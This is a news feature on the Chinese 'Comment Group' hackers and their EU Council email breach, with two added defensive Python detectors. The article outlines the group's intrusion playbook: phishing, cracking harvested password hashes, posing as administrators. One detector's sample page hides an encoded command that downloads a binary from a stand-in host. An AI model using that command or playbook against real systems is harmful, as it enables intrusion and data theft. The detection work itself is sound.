China's Comment Group Hacks Europe—and the World
When Greece was falling apart last summer, European Union leaders rushed to prepare another round of capital injections for Athens. Someone with advance knowledge of just where those hundred billion-plus euros were going and when they’d be deployed could have made a fortune. Someone like the hackers who had infiltrated the EU Council’s computers.
Over 10 days last July, the hackers returned to the Council’s computers four times, accessing the e-mails of 11 top economic, security, and foreign affairs officials. On July 18, they accessed the e-mails of EU Council President Herman Van Rompuy, Europe’s point man for shepherding the delicate politics of the Greek bailout, in just 14 minutes.
The EU breach, first reported by Bloomberg News on July 27, was a particularly audacious act of cyber-espionage by the team long known to U.S. intelligence as Byzantine Candor. Arguably China’s preeminent hacker collective, it also has government ties, according to a 2008 U.S. State Department cable published by WikiLeaks. The collective’s signature tactic, steering infected computers with instructions hidden inside the HTML comments of web pages (text that a browser never displays), earned it another name in private security circles: the Comment Group.
In secret, some 30 U.S.-based private-security researchers managed to monitor the group for nearly two months last summer. None of the researchers contacted by Bloomberg News wished to be named because of the sensitivity of the data. The researchers exploited a vulnerability in the hackers’ own security and created a digital diary that logged their every move as they crept into the networks of at least 20 victims, shut off antivirus systems, camouflaged themselves as system administrators, and then tried to cover their tracks.
The researchers’ computer logs offer an unprecedented minute-by-minute look at the Comment Group’s highly organized operations, believed to be at the cutting edge of China’s hacking capabilities. “They aren’t doing this for fun. They are doing it in this case because this is tradable information,” says Richard Falkenrath, formerly deputy assistant to the President and deputy homeland security adviser under George W. Bush. “We may not be able to get information that anyone either shorted or went long on EU sovereign debt on this, but that’s the obvious market.”
China’s foreign ministry in Beijing dismisses allegations of state-sponsored hacking as baseless and says the government will crack down given adequate proof. U.S. National Security Council spokesman Tommy Vietor declined to discuss the Comment Group specifically, referring reporters to a May 4 statement by Secretary of State Hillary Clinton in which she said the U.S. and China would work to “develop a shared understanding of acceptable norms of behavior” around commercial data and intellectual property online.
Beyond the Comment Group, what started as attacks on the U.S. military and defense contractors by Chinese hacker groups has widened into a campaign from which no corporate entity is safe. Attacks on Google, Morgan Stanley, and ExxonMobil are among the few that have become public. “What the general public hears about—stolen credit card numbers, somebody hacked LinkedIn—that’s the tip of the iceberg, the unclassified stuff,” says Shawn Henry, former executive assistant director at the FBI’s cyber division, who left the agency in April. “I’ve been circling the iceberg in a submarine. This is the biggest vacuuming up of U.S. proprietary data that we’ve ever seen. It’s a machine.”
The Comment Group researchers say the sheer volume and breadth of the hacker collective’s attacks shocked them. Victims ranged from corporate giants to top lawyers, from defense contractor Halliburton to Washington law firm Wiley Rein to a Canadian magistrate. Earlier targets included the 2008 presidential campaigns of Barack Obama and John McCain and a U.S. nuclear power plant sited next to a fault line. Alex Lanstein, a senior researcher for the security company FireEye, estimates the group has hacked more than 1,000 organizations since 2010.
Comment Group’s attacks have been so successful that a cyber-security unit within the Air Force Office of Special Investigations in San Antonio is dedicated to tracking them, according to a person familiar with the unit who could not speak on the record due to national security concerns. Most of the attacks the researchers witnessed, though, were on commercial targets relevant to China’s economic interests. The lawyers targeted, for example, were pursuing trade claims against the country’s exporters; another victim was an energy company preparing to drill in a disputed area of the South China Sea that Chinese officials say belongs to China.
U.S. spycatchers and private security researchers say Comment Group thefts include anything that could give China an edge as it strives to become the world’s largest economy. From the networks of major oil companies, they take seismic maps charting oil reserves; from patent law firms, clients’ trade secrets; from investment banks, market analysis that might affect the global ventures of state-owned companies. Drugmakers and tech companies are also targets.
One of the group’s tricks is to hijack unassuming websites and use them as relays, planting the commands for infected machines in the pages’ HTML comments, where neither a visitor nor the site’s owner sees anything amiss. (Host websites have included those of a teacher at a south Texas high school and an Idaho drag-racing track.) This turns mom-and-pop sites into tools of foreign espionage, but it also gives defenders a handle: once such a zombie site is identified, watching it is a relatively easy way to track Comment Group activity.
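How a defender might hunt for comment-embedded commands on a suspected relay site, as an added example (not code from the article, and not the group’s own tooling): the scanner below pulls every HTML comment out of a page and flags the ones that look like an encoded payload rather than a developer’s note. It assumes a hypothetical scheme in which the command is a base64 string; the sample page, the command hidden in it, the documentation-range IP address, and the length and entropy thresholds are all constructed for this example and would need tuning against real pages.

```python
"""Hunt for command-carrying HTML comments on a hijacked web page.

Added example, not from the article and not the Comment Group's tooling.
It assumes a hypothetical scheme in which the command sits in an HTML
comment as a base64 string; real implants may encode differently, so
treat the thresholds below as a starting point for tuning, not signatures.
"""
import base64
import binascii
import math
import re
from html.parser import HTMLParser

# Heuristic thresholds (assumptions for this example).
MIN_LEN = 32        # ordinary comments such as "main navigation" are short
MIN_ENTROPY = 4.0   # bits per char; base64 of text is about 5, prose is lower
BASE64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


class CommentCollector(HTMLParser):
    """Collect the body of every <!-- ... --> comment in a document."""

    def __init__(self):
        super().__init__()
        self.comments = []

    def handle_comment(self, data):
        self.comments.append(data.strip())


def extract_comments(html: str) -> list:
    parser = CommentCollector()
    parser.feed(html)
    parser.close()
    return parser.comments


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character; 0.0 for an empty or one-symbol string."""
    if not s:
        return 0.0
    n = len(s)
    freqs = {}
    for ch in s:
        freqs[ch] = freqs.get(ch, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in freqs.values())


def try_base64(s: str):
    """Return the decoded bytes if s is well-formed base64, else None."""
    try:
        return base64.b64decode(s, validate=True)
    except (binascii.Error, ValueError):
        return None


def find_suspicious_comments(html: str) -> list:
    """Report each comment that is long, base64-shaped and high-entropy."""
    hits = []
    for c in extract_comments(html):
        if len(c) < MIN_LEN or not BASE64_RE.match(c):
            continue
        entropy = shannon_entropy(c)
        if entropy < MIN_ENTROPY:
            continue
        hits.append({"comment": c, "entropy": round(entropy, 2), "decoded": try_base64(c)})
    return hits


# Constructed sample: a hobby site with two ordinary comments and one
# carrying a base64-encoded command (198.51.100.0/24 is a documentation range).
HIDDEN_COMMAND = b"get http://198.51.100.7/update.bin"
SAMPLE_PAGE = (
    "<html><head><title>Race Schedule</title></head><body>\n"
    "<!-- main navigation -->\n"
    "<ul><li>Home</li><li>Results</li></ul>\n"
    "<!-- Copyright 2011 Example Raceway. All rights reserved. -->\n"
    "<!-- " + base64.b64encode(HIDDEN_COMMAND).decode() + " -->\n"
    "</body></html>\n"
)


if __name__ == "__main__":
    for hit in find_suspicious_comments(SAMPLE_PAGE):
        print(f"entropy={hit['entropy']} comment={hit['comment']!r}")
        print(f"  decodes to: {hit['decoded']!r}")
```

The base64-alphabet check does most of the work, because ordinary comments contain spaces and punctuation; the entropy floor is there to discard long but repetitive strings such as padding or ASCII art. On a real hunt you would run this over the pages a suspect implant is known to fetch and compare the flagged comments across crawls, since a relay site's payload changes while its visible content does not.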
In case after case, the hackers’ trail appeared wherever and whenever there were global headlines. Last summer, when the news focused on Europe’s debt crisis, the Comment Group followed. The timing coincided with a frantic period for EU Council President Van Rompuy, set off by the failure on July 11 of the EU finance ministers to agree on a second bailout package for Greece. Over the next 10 days, the slight, balding former Belgian prime minister presided over tense negotiations, drawing European leaders, including German Chancellor Angela Merkel and European Central Bank President Jean-Claude Trichet, to a consensus. And the hackers had a ringside seat.
It’s clear from the logs that this was less a smash-and-grab hack than the cyber equivalent of a wiretap aimed at gathering vast amounts of intelligence over weeks or months. The hackers had an established routine, always checking in around 9 a.m. local time, the logs show. They controlled a Council server that gave them a complete run of the e-mail system. From there, they simply signed onto the accounts of Van Rompuy and the others. The spies grabbed e-mails and attached documents, encrypted them in compressed files, and catalogued the reams of material by date. They took a week’s worth of e-mails each time, appearing to follow a set protocol. Their other targets included Odile Renaud-Basso, then-economic adviser and deputy head of the cabinet, and the EU’s counter-terrorism coordinator. It’s unclear how long the hackers’ incursion lasted, the researchers say.
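The access pattern the logs describe, one controlling account opening eleven officials’ mailboxes in a short window at a fixed hour, is exactly what a mail-system audit log can be checked for. The detector below is an added example, not the article’s or the Council’s code: it groups mailbox reads by the principal performing them and raises one alert per principal whose sliding window covers an unusual number of mailboxes other than its own. The log format is hypothetical and the lines are constructed, so the regex, the one-hour window and the threshold of five are assumptions to adapt to a real audit feed.

```python
"""Flag one principal reading many different mailboxes in a short window.

Added example, not from the article and not the EU Council's logging.
The log format is hypothetical and the lines are constructed; map LINE_RE
onto whatever mailbox-audit format your mail system actually emits.
"""
import re
from collections import Counter, defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

LINE_RE = re.compile(r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) actor=(\S+) mailbox=(\S+)")


@dataclass
class Event:
    ts: datetime
    actor: str
    mailbox: str


@dataclass
class Alert:
    actor: str
    start: datetime
    end: datetime
    mailboxes: list


def parse_log(lines):
    """Yield an Event for each well-formed line; skip anything else."""
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            yield Event(datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S"),
                        m.group(2), m.group(3))


def detect_mailbox_fanout(lines, window=timedelta(hours=1), threshold=5):
    """One Alert per actor whose sliding window covers >= threshold foreign mailboxes.

    A 'foreign' mailbox is any mailbox other than the actor's own; the alert
    reports the widest window seen for that actor so triage sees the full set.
    """
    by_actor = defaultdict(list)
    for e in sorted(parse_log(lines), key=lambda e: e.ts):
        by_actor[e.actor].append(e)

    alerts = []
    for actor, evs in by_actor.items():
        counts = Counter()   # foreign mailboxes currently inside the window
        start = 0
        best = None
        for end, e in enumerate(evs):
            if e.mailbox != actor:
                counts[e.mailbox] += 1
            # Slide the window forward until it spans at most `window`.
            while e.ts - evs[start].ts > window:
                old = evs[start].mailbox
                if old != actor:
                    counts[old] -= 1
                    if counts[old] == 0:
                        del counts[old]
                start += 1
            if len(counts) >= threshold and (best is None or len(counts) > len(best.mailboxes)):
                best = Alert(actor, evs[start].ts, e.ts, sorted(counts))
        if best:
            alerts.append(best)
    return alerts


# Constructed sample log: a mail admin account sweeping six executive
# mailboxes just after 9 a.m., against a backdrop of ordinary activity.
SAMPLE_LOG = """\
2011-07-18 08:55:01 actor=jsmith mailbox=jsmith op=folder_read
2011-07-18 09:01:12 actor=mailadmin mailbox=exec01 op=folder_read
2011-07-18 09:03:40 actor=mailadmin mailbox=exec02 op=folder_read
2011-07-18 09:05:07 actor=mailadmin mailbox=exec03 op=folder_read
2011-07-18 09:06:55 actor=helpdesk mailbox=jsmith op=folder_read
2011-07-18 09:08:22 actor=mailadmin mailbox=exec04 op=folder_read
2011-07-18 09:10:49 actor=mailadmin mailbox=exec05 op=folder_read
2011-07-18 09:13:16 actor=mailadmin mailbox=exec06 op=folder_read
2011-07-18 09:14:02 actor=jsmith mailbox=shared-finance op=folder_read
2011-07-18 14:30:00 actor=helpdesk mailbox=exec02 op=folder_read
2011-07-19 09:02:18 actor=mailadmin mailbox=exec01 op=folder_read
"""


if __name__ == "__main__":
    for a in detect_mailbox_fanout(SAMPLE_LOG.splitlines()):
        print(f"{a.actor}: {len(a.mailboxes)} mailboxes between {a.start} and {a.end}: {a.mailboxes}")
```

A legitimate admin touching many mailboxes in a day is common; what stands out in the article's account is the combination of breadth, a fixed daily time, and week-sized pulls from each account, so a useful deployment would baseline each privileged principal's normal fan-out and alert on deviations rather than on a single fixed threshold.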
There’s also no indication the hackers penetrated the Council’s offline system for secret documents. “Classified information and other sensitive internal information is handled on separate, dedicated networks,” the Council press office said in a statement when asked about the hacks. The e-mail networks “are not designed for handling classified information.”
The EU attacks were representative of the Comment Group’s playbook, the researchers say. Starting with a malware-laden e-mail, they moved rapidly through networks, harvesting stored password hashes (the “encrypted passwords” that can be cracked off-line, out of reach of the victim’s lockout and logging controls), and then returning with the recovered credentials to pass themselves off as the organization’s own network administrators. The hackers were able to dip in and out of networks, sometimes over months, disabling antivirus software and assuming administrator privileges as needed.
The Comment Group has changed up a few tactics since last summer, the researchers say, but not its pace. Falkenrath, the former Bush security aide, says China has succeeded in integrating decision-making about foreign economic and investment policy with intelligence collection. “That has big implications for the rest of the world when it deals with the country on those terms,” he says.